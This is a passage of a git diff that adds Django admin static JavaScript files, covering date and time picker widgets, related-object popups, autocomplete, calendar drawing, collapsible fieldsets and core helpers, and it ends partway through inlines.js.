'Note: You are %s hour behind server time.', + 'Note: You are %s hours behind server time.', + timezoneOffset + ); + } + message = interpolate(message, [timezoneOffset]); + + const warning = document.createElement('span'); + warning.className = warningClass; + warning.textContent = message; + inp.parentNode.appendChild(document.createElement('br')); + inp.parentNode.appendChild(warning); + }, + // Add clock widget to a given field + addClock: function(inp) { + const num = DateTimeShortcuts.clockInputs.length; + DateTimeShortcuts.clockInputs[num] = inp; + DateTimeShortcuts.dismissClockFunc[num] = function() { DateTimeShortcuts.dismissClock(num); return true; }; + + // Shortcut links (clock icon and "Now" link) + const shortcuts_span = document.createElement('span'); + shortcuts_span.className = DateTimeShortcuts.shortCutsClass; + inp.parentNode.insertBefore(shortcuts_span, inp.nextSibling); + const now_link = document.createElement('a'); + now_link.href = "#"; + now_link.textContent = gettext('Now'); + now_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.handleClockQuicklink(num, -1); + }); + const clock_link = document.createElement('a'); + clock_link.href = '#'; + clock_link.id = DateTimeShortcuts.clockLinkName + num; + clock_link.addEventListener('click', function(e) { + e.preventDefault(); + // avoid triggering the document click handler to dismiss the clock + e.stopPropagation(); + DateTimeShortcuts.openClock(num); + }); + + quickElement( + 'span', clock_link, '', + 'class', 'clock-icon', + 'title', gettext('Choose a Time') + ); + shortcuts_span.appendChild(document.createTextNode('\u00A0')); + shortcuts_span.appendChild(now_link); + shortcuts_span.appendChild(document.createTextNode('\u00A0|\u00A0')); + shortcuts_span.appendChild(clock_link); + + // Create clock link div + // + // Markup looks like: + //
    + //

    Choose a time

    + // + //

    Cancel

    + //
    + + const clock_box = document.createElement('div'); + clock_box.style.display = 'none'; + clock_box.style.position = 'absolute'; + clock_box.className = 'clockbox module'; + clock_box.id = DateTimeShortcuts.clockDivName + num; + document.body.appendChild(clock_box); + clock_box.addEventListener('click', function(e) { e.stopPropagation(); }); + + quickElement('h2', clock_box, gettext('Choose a time')); + const time_list = quickElement('ul', clock_box); + time_list.className = 'timelist'; + // The list of choices can be overridden in JavaScript like this: + // DateTimeShortcuts.clockHours.name = [['3 a.m.', 3]]; + // where name is the name attribute of the . + const name = typeof DateTimeShortcuts.clockHours[inp.name] === 'undefined' ? 'default_' : inp.name; + DateTimeShortcuts.clockHours[name].forEach(function(element) { + const time_link = quickElement('a', quickElement('li', time_list), gettext(element[0]), 'href', '#'); + time_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.handleClockQuicklink(num, element[1]); + }); + }); + + const cancel_p = quickElement('p', clock_box); + cancel_p.className = 'calendar-cancel'; + const cancel_link = quickElement('a', cancel_p, gettext('Cancel'), 'href', '#'); + cancel_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.dismissClock(num); + }); + + document.addEventListener('keyup', function(event) { + if (event.which === 27) { + // ESC key closes popup + DateTimeShortcuts.dismissClock(num); + event.preventDefault(); + } + }); + }, + openClock: function(num) { + const clock_box = document.getElementById(DateTimeShortcuts.clockDivName + num); + const clock_link = document.getElementById(DateTimeShortcuts.clockLinkName + num); + + // Recalculate the clockbox position + // is it left-to-right or right-to-left layout ? + if (window.getComputedStyle(document.body).direction !== 'rtl') { + clock_box.style.left = findPosX(clock_link) + 17 + 'px'; + } + else { + // since style's width is in em, it'd be tough to calculate + // px value of it. let's use an estimated px for now + clock_box.style.left = findPosX(clock_link) - 110 + 'px'; + } + clock_box.style.top = Math.max(0, findPosY(clock_link) - 30) + 'px'; + + // Show the clock box + clock_box.style.display = 'block'; + document.addEventListener('click', DateTimeShortcuts.dismissClockFunc[num]); + }, + dismissClock: function(num) { + document.getElementById(DateTimeShortcuts.clockDivName + num).style.display = 'none'; + document.removeEventListener('click', DateTimeShortcuts.dismissClockFunc[num]); + }, + handleClockQuicklink: function(num, val) { + let d; + if (val === -1) { + d = DateTimeShortcuts.now(); + } + else { + d = new Date(1970, 1, 1, val, 0, 0, 0); + } + DateTimeShortcuts.clockInputs[num].value = d.strftime(get_format('TIME_INPUT_FORMATS')[0]); + DateTimeShortcuts.clockInputs[num].focus(); + DateTimeShortcuts.dismissClock(num); + }, + // Add calendar widget to a given field. + addCalendar: function(inp) { + const num = DateTimeShortcuts.calendars.length; + + DateTimeShortcuts.calendarInputs[num] = inp; + DateTimeShortcuts.dismissCalendarFunc[num] = function() { DateTimeShortcuts.dismissCalendar(num); return true; }; + + // Shortcut links (calendar icon and "Today" link) + const shortcuts_span = document.createElement('span'); + shortcuts_span.className = DateTimeShortcuts.shortCutsClass; + inp.parentNode.insertBefore(shortcuts_span, inp.nextSibling); + const today_link = document.createElement('a'); + today_link.href = '#'; + today_link.appendChild(document.createTextNode(gettext('Today'))); + today_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.handleCalendarQuickLink(num, 0); + }); + const cal_link = document.createElement('a'); + cal_link.href = '#'; + cal_link.id = DateTimeShortcuts.calendarLinkName + num; + cal_link.addEventListener('click', function(e) { + e.preventDefault(); + // avoid triggering the document click handler to dismiss the calendar + e.stopPropagation(); + DateTimeShortcuts.openCalendar(num); + }); + quickElement( + 'span', cal_link, '', + 'class', 'date-icon', + 'title', gettext('Choose a Date') + ); + shortcuts_span.appendChild(document.createTextNode('\u00A0')); + shortcuts_span.appendChild(today_link); + shortcuts_span.appendChild(document.createTextNode('\u00A0|\u00A0')); + shortcuts_span.appendChild(cal_link); + + // Create calendarbox div. + // + // Markup looks like: + // + //
    + //

    + // + // February 2003 + //

    + //
    + // + //
    + //
    + // Yesterday | Today | Tomorrow + //
    + //

    Cancel

    + //
    + const cal_box = document.createElement('div'); + cal_box.style.display = 'none'; + cal_box.style.position = 'absolute'; + cal_box.className = 'calendarbox module'; + cal_box.id = DateTimeShortcuts.calendarDivName1 + num; + document.body.appendChild(cal_box); + cal_box.addEventListener('click', function(e) { e.stopPropagation(); }); + + // next-prev links + const cal_nav = quickElement('div', cal_box); + const cal_nav_prev = quickElement('a', cal_nav, '<', 'href', '#'); + cal_nav_prev.className = 'calendarnav-previous'; + cal_nav_prev.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.drawPrev(num); + }); + + const cal_nav_next = quickElement('a', cal_nav, '>', 'href', '#'); + cal_nav_next.className = 'calendarnav-next'; + cal_nav_next.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.drawNext(num); + }); + + // main box + const cal_main = quickElement('div', cal_box, '', 'id', DateTimeShortcuts.calendarDivName2 + num); + cal_main.className = 'calendar'; + DateTimeShortcuts.calendars[num] = new Calendar(DateTimeShortcuts.calendarDivName2 + num, DateTimeShortcuts.handleCalendarCallback(num)); + DateTimeShortcuts.calendars[num].drawCurrent(); + + // calendar shortcuts + const shortcuts = quickElement('div', cal_box); + shortcuts.className = 'calendar-shortcuts'; + let day_link = quickElement('a', shortcuts, gettext('Yesterday'), 'href', '#'); + day_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.handleCalendarQuickLink(num, -1); + }); + shortcuts.appendChild(document.createTextNode('\u00A0|\u00A0')); + day_link = quickElement('a', shortcuts, gettext('Today'), 'href', '#'); + day_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.handleCalendarQuickLink(num, 0); + }); + shortcuts.appendChild(document.createTextNode('\u00A0|\u00A0')); + day_link = quickElement('a', shortcuts, gettext('Tomorrow'), 'href', '#'); + day_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.handleCalendarQuickLink(num, +1); + }); + + // cancel bar + const cancel_p = quickElement('p', cal_box); + cancel_p.className = 'calendar-cancel'; + const cancel_link = quickElement('a', cancel_p, gettext('Cancel'), 'href', '#'); + cancel_link.addEventListener('click', function(e) { + e.preventDefault(); + DateTimeShortcuts.dismissCalendar(num); + }); + document.addEventListener('keyup', function(event) { + if (event.which === 27) { + // ESC key closes popup + DateTimeShortcuts.dismissCalendar(num); + event.preventDefault(); + } + }); + }, + openCalendar: function(num) { + const cal_box = document.getElementById(DateTimeShortcuts.calendarDivName1 + num); + const cal_link = document.getElementById(DateTimeShortcuts.calendarLinkName + num); + const inp = DateTimeShortcuts.calendarInputs[num]; + + // Determine if the current value in the input has a valid date. + // If so, draw the calendar with that date's year and month. + if (inp.value) { + const format = get_format('DATE_INPUT_FORMATS')[0]; + const selected = inp.value.strptime(format); + const year = selected.getUTCFullYear(); + const month = selected.getUTCMonth() + 1; + const re = /\d{4}/; + if (re.test(year.toString()) && month >= 1 && month <= 12) { + DateTimeShortcuts.calendars[num].drawDate(month, year, selected); + } + } + + // Recalculate the clockbox position + // is it left-to-right or right-to-left layout ? + if (window.getComputedStyle(document.body).direction !== 'rtl') { + cal_box.style.left = findPosX(cal_link) + 17 + 'px'; + } + else { + // since style's width is in em, it'd be tough to calculate + // px value of it. let's use an estimated px for now + cal_box.style.left = findPosX(cal_link) - 180 + 'px'; + } + cal_box.style.top = Math.max(0, findPosY(cal_link) - 75) + 'px'; + + cal_box.style.display = 'block'; + document.addEventListener('click', DateTimeShortcuts.dismissCalendarFunc[num]); + }, + dismissCalendar: function(num) { + document.getElementById(DateTimeShortcuts.calendarDivName1 + num).style.display = 'none'; + document.removeEventListener('click', DateTimeShortcuts.dismissCalendarFunc[num]); + }, + drawPrev: function(num) { + DateTimeShortcuts.calendars[num].drawPreviousMonth(); + }, + drawNext: function(num) { + DateTimeShortcuts.calendars[num].drawNextMonth(); + }, + handleCalendarCallback: function(num) { + let format = get_format('DATE_INPUT_FORMATS')[0]; + // the format needs to be escaped a little + format = format.replace('\\', '\\\\') + .replace('\r', '\\r') + .replace('\n', '\\n') + .replace('\t', '\\t') + .replace("'", "\\'"); + return function(y, m, d) { + DateTimeShortcuts.calendarInputs[num].value = new Date(y, m - 1, d).strftime(format); + DateTimeShortcuts.calendarInputs[num].focus(); + document.getElementById(DateTimeShortcuts.calendarDivName1 + num).style.display = 'none'; + }; + }, + handleCalendarQuickLink: function(num, offset) { + const d = DateTimeShortcuts.now(); + d.setDate(d.getDate() + offset); + DateTimeShortcuts.calendarInputs[num].value = d.strftime(get_format('DATE_INPUT_FORMATS')[0]); + DateTimeShortcuts.calendarInputs[num].focus(); + DateTimeShortcuts.dismissCalendar(num); + } + }; + + window.addEventListener('load', DateTimeShortcuts.init); + window.DateTimeShortcuts = DateTimeShortcuts; +} diff --git a/master/static/admin/js/admin/RelatedObjectLookups.js b/master/static/admin/js/admin/RelatedObjectLookups.js new file mode 100644 index 0000000..8c95df7 --- /dev/null +++ b/master/static/admin/js/admin/RelatedObjectLookups.js @@ -0,0 +1,159 @@ +/*global SelectBox, interpolate*/ +// Handles related-objects functionality: lookup link for raw_id_fields +// and Add Another links. +'use strict'; +{ + const $ = django.jQuery; + + function showAdminPopup(triggeringLink, name_regexp, add_popup) { + const name = triggeringLink.id.replace(name_regexp, ''); + let href = triggeringLink.href; + if (add_popup) { + if (href.indexOf('?') === -1) { + href += '?_popup=1'; + } else { + href += '&_popup=1'; + } + } + const win = window.open(href, name, 'height=500,width=800,resizable=yes,scrollbars=yes'); + win.focus(); + return false; + } + + function showRelatedObjectLookupPopup(triggeringLink) { + return showAdminPopup(triggeringLink, /^lookup_/, true); + } + + function dismissRelatedLookupPopup(win, chosenId) { + const name = win.name; + const elem = document.getElementById(name); + if (elem.classList.contains('vManyToManyRawIdAdminField') && elem.value) { + elem.value += ',' + chosenId; + } else { + document.getElementById(name).value = chosenId; + } + win.close(); + } + + function showRelatedObjectPopup(triggeringLink) { + return showAdminPopup(triggeringLink, /^(change|add|delete)_/, false); + } + + function updateRelatedObjectLinks(triggeringLink) { + const $this = $(triggeringLink); + const siblings = $this.nextAll('.view-related, .change-related, .delete-related'); + if (!siblings.length) { + return; + } + const value = $this.val(); + if (value) { + siblings.each(function() { + const elm = $(this); + elm.attr('href', elm.attr('data-href-template').replace('__fk__', value)); + }); + } else { + siblings.removeAttr('href'); + } + } + + function dismissAddRelatedObjectPopup(win, newId, newRepr) { + const name = win.name; + const elem = document.getElementById(name); + if (elem) { + const elemName = elem.nodeName.toUpperCase(); + if (elemName === 'SELECT') { + elem.options[elem.options.length] = new Option(newRepr, newId, true, true); + } else if (elemName === 'INPUT') { + if (elem.classList.contains('vManyToManyRawIdAdminField') && elem.value) { + elem.value += ',' + newId; + } else { + elem.value = newId; + } + } + // Trigger a change event to update related links if required. + $(elem).trigger('change'); + } else { + const toId = name + "_to"; + const o = new Option(newRepr, newId); + SelectBox.add_to_cache(toId, o); + SelectBox.redisplay(toId); + } + win.close(); + } + + function dismissChangeRelatedObjectPopup(win, objId, newRepr, newId) { + const id = win.name.replace(/^edit_/, ''); + const selectsSelector = interpolate('#%s, #%s_from, #%s_to', [id, id, id]); + const selects = $(selectsSelector); + selects.find('option').each(function() { + if (this.value === objId) { + this.textContent = newRepr; + this.value = newId; + } + }); + selects.next().find('.select2-selection__rendered').each(function() { + // The element can have a clear button as a child. + // Use the lastChild to modify only the displayed value. + this.lastChild.textContent = newRepr; + this.title = newRepr; + }); + win.close(); + } + + function dismissDeleteRelatedObjectPopup(win, objId) { + const id = win.name.replace(/^delete_/, ''); + const selectsSelector = interpolate('#%s, #%s_from, #%s_to', [id, id, id]); + const selects = $(selectsSelector); + selects.find('option').each(function() { + if (this.value === objId) { + $(this).remove(); + } + }).trigger('change'); + win.close(); + } + + window.showRelatedObjectLookupPopup = showRelatedObjectLookupPopup; + window.dismissRelatedLookupPopup = dismissRelatedLookupPopup; + window.showRelatedObjectPopup = showRelatedObjectPopup; + window.updateRelatedObjectLinks = updateRelatedObjectLinks; + window.dismissAddRelatedObjectPopup = dismissAddRelatedObjectPopup; + window.dismissChangeRelatedObjectPopup = dismissChangeRelatedObjectPopup; + window.dismissDeleteRelatedObjectPopup = dismissDeleteRelatedObjectPopup; + + // Kept for backward compatibility + window.showAddAnotherPopup = showRelatedObjectPopup; + window.dismissAddAnotherPopup = dismissAddRelatedObjectPopup; + + $(document).ready(function() { + $("a[data-popup-opener]").on('click', function(event) { + event.preventDefault(); + opener.dismissRelatedLookupPopup(window, $(this).data("popup-opener")); + }); + $('body').on('click', '.related-widget-wrapper-link', function(e) { + e.preventDefault(); + if (this.href) { + const event = $.Event('django:show-related', {href: this.href}); + $(this).trigger(event); + if (!event.isDefaultPrevented()) { + showRelatedObjectPopup(this); + } + } + }); + $('body').on('change', '.related-widget-wrapper select', function(e) { + const event = $.Event('django:update-related'); + $(this).trigger(event); + if (!event.isDefaultPrevented()) { + updateRelatedObjectLinks(this); + } + }); + $('.related-widget-wrapper select').trigger('change'); + $('body').on('click', '.related-lookup', function(e) { + e.preventDefault(); + const event = $.Event('django:lookup-related'); + $(this).trigger(event); + if (!event.isDefaultPrevented()) { + showRelatedObjectLookupPopup(this); + } + }); + }); +} diff --git a/master/static/admin/js/autocomplete.js b/master/static/admin/js/autocomplete.js new file mode 100644 index 0000000..c922b30 --- /dev/null +++ b/master/static/admin/js/autocomplete.js @@ -0,0 +1,38 @@ +'use strict'; +{ + const $ = django.jQuery; + const init = function($element, options) { + const settings = $.extend({ + ajax: { + data: function(params) { + return { + term: params.term, + page: params.page + }; + } + } + }, options); + $element.select2(settings); + }; + + $.fn.djangoAdminSelect2 = function(options) { + const settings = $.extend({}, options); + $.each(this, function(i, element) { + const $element = $(element); + init($element, settings); + }); + return this; + }; + + $(function() { + // Initialize all autocomplete widgets except the one in the template + // form used when a new formset is added. + $('.admin-autocomplete').not('[name*=__prefix__]').djangoAdminSelect2(); + }); + + $(document).on('formset:added', (function() { + return function(event, $newFormset) { + return $newFormset.find('.admin-autocomplete').djangoAdminSelect2(); + }; + })(this)); +} diff --git a/master/static/admin/js/calendar.js b/master/static/admin/js/calendar.js new file mode 100644 index 0000000..64598bb --- /dev/null +++ b/master/static/admin/js/calendar.js @@ -0,0 +1,207 @@ +/*global gettext, pgettext, get_format, quickElement, removeChildren*/ +/* +calendar.js - Calendar functions by Adrian Holovaty +depends on core.js for utility functions like removeChildren or quickElement +*/ +'use strict'; +{ + // CalendarNamespace -- Provides a collection of HTML calendar-related helper functions + const CalendarNamespace = { + monthsOfYear: [ + gettext('January'), + gettext('February'), + gettext('March'), + gettext('April'), + gettext('May'), + gettext('June'), + gettext('July'), + gettext('August'), + gettext('September'), + gettext('October'), + gettext('November'), + gettext('December') + ], + daysOfWeek: [ + pgettext('one letter Sunday', 'S'), + pgettext('one letter Monday', 'M'), + pgettext('one letter Tuesday', 'T'), + pgettext('one letter Wednesday', 'W'), + pgettext('one letter Thursday', 'T'), + pgettext('one letter Friday', 'F'), + pgettext('one letter Saturday', 'S') + ], + firstDayOfWeek: parseInt(get_format('FIRST_DAY_OF_WEEK')), + isLeapYear: function(year) { + return (((year % 4) === 0) && ((year % 100) !== 0 ) || ((year % 400) === 0)); + }, + getDaysInMonth: function(month, year) { + let days; + if (month === 1 || month === 3 || month === 5 || month === 7 || month === 8 || month === 10 || month === 12) { + days = 31; + } + else if (month === 4 || month === 6 || month === 9 || month === 11) { + days = 30; + } + else if (month === 2 && CalendarNamespace.isLeapYear(year)) { + days = 29; + } + else { + days = 28; + } + return days; + }, + draw: function(month, year, div_id, callback, selected) { // month = 1-12, year = 1-9999 + const today = new Date(); + const todayDay = today.getDate(); + const todayMonth = today.getMonth() + 1; + const todayYear = today.getFullYear(); + let todayClass = ''; + + // Use UTC functions here because the date field does not contain time + // and using the UTC function variants prevent the local time offset + // from altering the date, specifically the day field. For example: + // + // ``` + // var x = new Date('2013-10-02'); + // var day = x.getDate(); + // ``` + // + // The day variable above will be 1 instead of 2 in, say, US Pacific time + // zone. + let isSelectedMonth = false; + if (typeof selected !== 'undefined') { + isSelectedMonth = (selected.getUTCFullYear() === year && (selected.getUTCMonth() + 1) === month); + } + + month = parseInt(month); + year = parseInt(year); + const calDiv = document.getElementById(div_id); + removeChildren(calDiv); + const calTable = document.createElement('table'); + quickElement('caption', calTable, CalendarNamespace.monthsOfYear[month - 1] + ' ' + year); + const tableBody = quickElement('tbody', calTable); + + // Draw days-of-week header + let tableRow = quickElement('tr', tableBody); + for (let i = 0; i < 7; i++) { + quickElement('th', tableRow, CalendarNamespace.daysOfWeek[(i + CalendarNamespace.firstDayOfWeek) % 7]); + } + + const startingPos = new Date(year, month - 1, 1 - CalendarNamespace.firstDayOfWeek).getDay(); + const days = CalendarNamespace.getDaysInMonth(month, year); + + let nonDayCell; + + // Draw blanks before first of month + tableRow = quickElement('tr', tableBody); + for (let i = 0; i < startingPos; i++) { + nonDayCell = quickElement('td', tableRow, ' '); + nonDayCell.className = "nonday"; + } + + function calendarMonth(y, m) { + function onClick(e) { + e.preventDefault(); + callback(y, m, this.textContent); + } + return onClick; + } + + // Draw days of month + let currentDay = 1; + for (let i = startingPos; currentDay <= days; i++) { + if (i % 7 === 0 && currentDay !== 1) { + tableRow = quickElement('tr', tableBody); + } + if ((currentDay === todayDay) && (month === todayMonth) && (year === todayYear)) { + todayClass = 'today'; + } else { + todayClass = ''; + } + + // use UTC function; see above for explanation. + if (isSelectedMonth && currentDay === selected.getUTCDate()) { + if (todayClass !== '') { + todayClass += " "; + } + todayClass += "selected"; + } + + const cell = quickElement('td', tableRow, '', 'class', todayClass); + const link = quickElement('a', cell, currentDay, 'href', '#'); + link.addEventListener('click', calendarMonth(year, month)); + currentDay++; + } + + // Draw blanks after end of month (optional, but makes for valid code) + while (tableRow.childNodes.length < 7) { + nonDayCell = quickElement('td', tableRow, ' '); + nonDayCell.className = "nonday"; + } + + calDiv.appendChild(calTable); + } + }; + + // Calendar -- A calendar instance + function Calendar(div_id, callback, selected) { + // div_id (string) is the ID of the element in which the calendar will + // be displayed + // callback (string) is the name of a JavaScript function that will be + // called with the parameters (year, month, day) when a day in the + // calendar is clicked + this.div_id = div_id; + this.callback = callback; + this.today = new Date(); + this.currentMonth = this.today.getMonth() + 1; + this.currentYear = this.today.getFullYear(); + if (typeof selected !== 'undefined') { + this.selected = selected; + } + } + Calendar.prototype = { + drawCurrent: function() { + CalendarNamespace.draw(this.currentMonth, this.currentYear, this.div_id, this.callback, this.selected); + }, + drawDate: function(month, year, selected) { + this.currentMonth = month; + this.currentYear = year; + + if(selected) { + this.selected = selected; + } + + this.drawCurrent(); + }, + drawPreviousMonth: function() { + if (this.currentMonth === 1) { + this.currentMonth = 12; + this.currentYear--; + } + else { + this.currentMonth--; + } + this.drawCurrent(); + }, + drawNextMonth: function() { + if (this.currentMonth === 12) { + this.currentMonth = 1; + this.currentYear++; + } + else { + this.currentMonth++; + } + this.drawCurrent(); + }, + drawPreviousYear: function() { + this.currentYear--; + this.drawCurrent(); + }, + drawNextYear: function() { + this.currentYear++; + this.drawCurrent(); + } + }; + window.Calendar = Calendar; + window.CalendarNamespace = CalendarNamespace; +} diff --git a/master/static/admin/js/cancel.js b/master/static/admin/js/cancel.js new file mode 100644 index 0000000..cfe06c2 --- /dev/null +++ b/master/static/admin/js/cancel.js @@ -0,0 +1,28 @@ +'use strict'; +{ + // Call function fn when the DOM is loaded and ready. If it is already + // loaded, call the function now. + // http://youmightnotneedjquery.com/#ready + function ready(fn) { + if (document.readyState !== 'loading') { + fn(); + } else { + document.addEventListener('DOMContentLoaded', fn); + } + } + + ready(function() { + function handleClick(event) { + event.preventDefault(); + if (window.location.search.indexOf('&_popup=1') === -1) { + window.history.back(); // Go back if not a popup. + } else { + window.close(); // Otherwise, close the popup. + } + } + + document.querySelectorAll('.cancel-link').forEach(function(el) { + el.addEventListener('click', handleClick); + }); + }); +} diff --git a/master/static/admin/js/change_form.js b/master/static/admin/js/change_form.js new file mode 100644 index 0000000..96a4c62 --- /dev/null +++ b/master/static/admin/js/change_form.js @@ -0,0 +1,16 @@ +'use strict'; +{ + const inputTags = ['BUTTON', 'INPUT', 'SELECT', 'TEXTAREA']; + const modelName = document.getElementById('django-admin-form-add-constants').dataset.modelName; + if (modelName) { + const form = document.getElementById(modelName + '_form'); + for (const element of form.elements) { + // HTMLElement.offsetParent returns null when the element is not + // rendered. + if (inputTags.includes(element.tagName) && !element.disabled && element.offsetParent) { + element.focus(); + break; + } + } + } +} diff --git a/master/static/admin/js/collapse.js b/master/static/admin/js/collapse.js new file mode 100644 index 0000000..c6c7b0f --- /dev/null +++ b/master/static/admin/js/collapse.js @@ -0,0 +1,43 @@ +/*global gettext*/ +'use strict'; +{ + window.addEventListener('load', function() { + // Add anchor tag for Show/Hide link + const fieldsets = document.querySelectorAll('fieldset.collapse'); + for (const [i, elem] of fieldsets.entries()) { + // Don't hide if fields in this fieldset have errors + if (elem.querySelectorAll('div.errors, ul.errorlist').length === 0) { + elem.classList.add('collapsed'); + const h2 = elem.querySelector('h2'); + const link = document.createElement('a'); + link.id = 'fieldsetcollapser' + i; + link.className = 'collapse-toggle'; + link.href = '#'; + link.textContent = gettext('Show'); + h2.appendChild(document.createTextNode(' (')); + h2.appendChild(link); + h2.appendChild(document.createTextNode(')')); + } + } + // Add toggle to hide/show anchor tag + const toggleFunc = function(ev) { + if (ev.target.matches('.collapse-toggle')) { + ev.preventDefault(); + ev.stopPropagation(); + const fieldset = ev.target.closest('fieldset'); + if (fieldset.classList.contains('collapsed')) { + // Show + ev.target.textContent = gettext('Hide'); + fieldset.classList.remove('collapsed'); + } else { + // Hide + ev.target.textContent = gettext('Show'); + fieldset.classList.add('collapsed'); + } + } + }; + document.querySelectorAll('fieldset.module').forEach(function(el) { + el.addEventListener('click', toggleFunc); + }); + }); +} diff --git a/master/static/admin/js/collapse.min.js b/master/static/admin/js/collapse.min.js new file mode 100644 index 0000000..06201c5 --- /dev/null +++ b/master/static/admin/js/collapse.min.js @@ -0,0 +1,2 @@ +'use strict';window.addEventListener("load",function(){var c=document.querySelectorAll("fieldset.collapse");for(const [a,b]of c.entries())if(0===b.querySelectorAll("div.errors, ul.errorlist").length){b.classList.add("collapsed");c=b.querySelector("h2");const d=document.createElement("a");d.id="fieldsetcollapser"+a;d.className="collapse-toggle";d.href="#";d.textContent=gettext("Show");c.appendChild(document.createTextNode(" ("));c.appendChild(d);c.appendChild(document.createTextNode(")"))}const e= +function(a){if(a.target.matches(".collapse-toggle")){a.preventDefault();a.stopPropagation();const b=a.target.closest("fieldset");b.classList.contains("collapsed")?(a.target.textContent=gettext("Hide"),b.classList.remove("collapsed")):(a.target.textContent=gettext("Show"),b.classList.add("collapsed"))}};document.querySelectorAll("fieldset.module").forEach(function(a){a.addEventListener("click",e)})}); diff --git a/master/static/admin/js/core.js b/master/static/admin/js/core.js new file mode 100644 index 0000000..8ef27b3 --- /dev/null +++ b/master/static/admin/js/core.js @@ -0,0 +1,163 @@ +// Core javascript helper functions +'use strict'; + +// quickElement(tagType, parentReference [, textInChildNode, attribute, attributeValue ...]); +function quickElement() { + const obj = document.createElement(arguments[0]); + if (arguments[2]) { + const textNode = document.createTextNode(arguments[2]); + obj.appendChild(textNode); + } + const len = arguments.length; + for (let i = 3; i < len; i += 2) { + obj.setAttribute(arguments[i], arguments[i + 1]); + } + arguments[1].appendChild(obj); + return obj; +} + +// "a" is reference to an object +function removeChildren(a) { + while (a.hasChildNodes()) { + a.removeChild(a.lastChild); + } +} + +// ---------------------------------------------------------------------------- +// Find-position functions by PPK +// See https://www.quirksmode.org/js/findpos.html +// ---------------------------------------------------------------------------- +function findPosX(obj) { + let curleft = 0; + if (obj.offsetParent) { + while (obj.offsetParent) { + curleft += obj.offsetLeft - obj.scrollLeft; + obj = obj.offsetParent; + } + } else if (obj.x) { + curleft += obj.x; + } + return curleft; +} + +function findPosY(obj) { + let curtop = 0; + if (obj.offsetParent) { + while (obj.offsetParent) { + curtop += obj.offsetTop - obj.scrollTop; + obj = obj.offsetParent; + } + } else if (obj.y) { + curtop += obj.y; + } + return curtop; +} + +//----------------------------------------------------------------------------- +// Date object extensions +// ---------------------------------------------------------------------------- +{ + Date.prototype.getTwelveHours = function() { + return this.getHours() % 12 || 12; + }; + + Date.prototype.getTwoDigitMonth = function() { + return (this.getMonth() < 9) ? '0' + (this.getMonth() + 1) : (this.getMonth() + 1); + }; + + Date.prototype.getTwoDigitDate = function() { + return (this.getDate() < 10) ? '0' + this.getDate() : this.getDate(); + }; + + Date.prototype.getTwoDigitTwelveHour = function() { + return (this.getTwelveHours() < 10) ? '0' + this.getTwelveHours() : this.getTwelveHours(); + }; + + Date.prototype.getTwoDigitHour = function() { + return (this.getHours() < 10) ? '0' + this.getHours() : this.getHours(); + }; + + Date.prototype.getTwoDigitMinute = function() { + return (this.getMinutes() < 10) ? '0' + this.getMinutes() : this.getMinutes(); + }; + + Date.prototype.getTwoDigitSecond = function() { + return (this.getSeconds() < 10) ? '0' + this.getSeconds() : this.getSeconds(); + }; + + Date.prototype.getFullMonthName = function() { + return typeof window.CalendarNamespace === "undefined" + ? this.getTwoDigitMonth() + : window.CalendarNamespace.monthsOfYear[this.getMonth()]; + }; + + Date.prototype.strftime = function(format) { + const fields = { + B: this.getFullMonthName(), + c: this.toString(), + d: this.getTwoDigitDate(), + H: this.getTwoDigitHour(), + I: this.getTwoDigitTwelveHour(), + m: this.getTwoDigitMonth(), + M: this.getTwoDigitMinute(), + p: (this.getHours() >= 12) ? 'PM' : 'AM', + S: this.getTwoDigitSecond(), + w: '0' + this.getDay(), + x: this.toLocaleDateString(), + X: this.toLocaleTimeString(), + y: ('' + this.getFullYear()).substr(2, 4), + Y: '' + this.getFullYear(), + '%': '%' + }; + let result = '', i = 0; + while (i < format.length) { + if (format.charAt(i) === '%') { + result = result + fields[format.charAt(i + 1)]; + ++i; + } + else { + result = result + format.charAt(i); + } + ++i; + } + return result; + }; + + // ---------------------------------------------------------------------------- + // String object extensions + // ---------------------------------------------------------------------------- + String.prototype.strptime = function(format) { + const split_format = format.split(/[.\-/]/); + const date = this.split(/[.\-/]/); + let i = 0; + let day, month, year; + while (i < split_format.length) { + switch (split_format[i]) { + case "%d": + day = date[i]; + break; + case "%m": + month = date[i] - 1; + break; + case "%Y": + year = date[i]; + break; + case "%y": + // A %y value in the range of [00, 68] is in the current + // century, while [69, 99] is in the previous century, + // according to the Open Group Specification. + if (parseInt(date[i], 10) >= 69) { + year = date[i]; + } else { + year = (new Date(Date.UTC(date[i], 0))).getUTCFullYear() + 100; + } + break; + } + ++i; + } + // Create Date object from UTC since the parsed value is supposed to be + // in UTC, not local time. Also, the calendar uses UTC functions for + // date extraction. + return new Date(Date.UTC(year, month, day)); + }; +} diff --git a/master/static/admin/js/inlines.js b/master/static/admin/js/inlines.js new file mode 100644 index 0000000..82ec027 --- /dev/null +++ b/master/static/admin/js/inlines.js @@ -0,0 +1,348 @@ +/*global DateTimeShortcuts, SelectFilter*/ +/** + * Django admin inlines + * + * Based on jQuery Formset 1.1 + * @author Stanislaus Madueke (stan DOT madueke AT gmail DOT com) + * @requires jQuery 1.2.6 or later + * + * Copyright (c) 2009, Stanislaus Madueke + * All rights reserved. + * + * Spiced up with Code from Zain Memon's GSoC project 2009 + * and modified for Django by Jannis Leidel, Travis Swicegood and Julien Phalip. + * + * Licensed under the New BSD License + * See: https://opensource.org/licenses/bsd-license.php + */ +'use strict'; +{ + const $ = django.jQuery; + $.fn.formset = function(opts) { + const options = $.extend({}, $.fn.formset.defaults, opts); + const $this = $(this); + const $parent = $this.parent(); + const updateElementIndex = function(el, prefix, ndx) { + const id_regex = new RegExp("(" + prefix + "-(\\d+|__prefix__))"); + const replacement = prefix + "-" + ndx; + if ($(el).prop("for")) { + $(el).prop("for", $(el).prop("for").replace(id_regex, replacement)); + } + if (el.id) { + el.id = el.id.replace(id_regex, replacement); + } + if (el.name) { + el.name = el.name.replace(id_regex, replacement); + } + }; + const totalForms = $("#id_" + options.prefix + "-TOTAL_FORMS").prop("autocomplete", "off"); + let nextIndex = parseInt(totalForms.val(), 10); + const maxForms = 